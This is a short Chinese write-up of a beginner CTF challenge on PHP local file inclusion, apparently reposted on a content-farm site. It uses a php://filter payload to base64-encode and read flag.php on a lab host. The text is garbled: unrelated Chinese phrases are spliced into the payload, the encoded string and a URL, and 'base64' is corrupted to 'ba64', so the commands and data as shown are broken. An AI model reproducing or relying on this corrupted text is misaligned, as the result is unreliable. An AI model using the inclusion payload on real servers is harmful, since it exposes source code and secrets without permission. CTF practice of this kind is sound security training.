进入靶场环境:
http://3ff0893f-e04a-41e6-87ad-a39b1889535e.node3.buuoj.cn/
点击tips:
然后就啥也没了,但是url中有 ?file=flag.php 猜测文件包含漏洞,尝试
文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码
php://filter/read=convert.新闻宣传工作总结ba64-encode/resource=xxx.php
这个方法可以读取代码
然后构造playload:
?file=php://filter/read=convert.ba64-encode/resource=flag.php
然后对得到的字符串PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NjNlMmIyYzAtNWY5Mi00NjJlLWFkYmYtZT椭圆的通径A1ODhhMzQ0MjhjfQo=
进行ba64解密得到flag:
<?php权利与权力的区别echo "Can you find out the flag?";//flag{63e2b2c0-5f92-462e-adb智慧医学f-e0588a34428c}
本文地址:https://blog上海专科学校排名.csdn.net/qq_41523170/article/details/107617936
本文发布于:2023-04-08 20:58:39,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/fanwen/zuowen/ef0048ab7b17e8a06e6f8ed02cf88ac1.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:[ACTF2020 新生赛]Include 1【文件包含】【读取代码】.doc
本文 PDF 下载地址:[ACTF2020 新生赛]Include 1【文件包含】【读取代码】.pdf
留言与评论(共有 0 条评论) |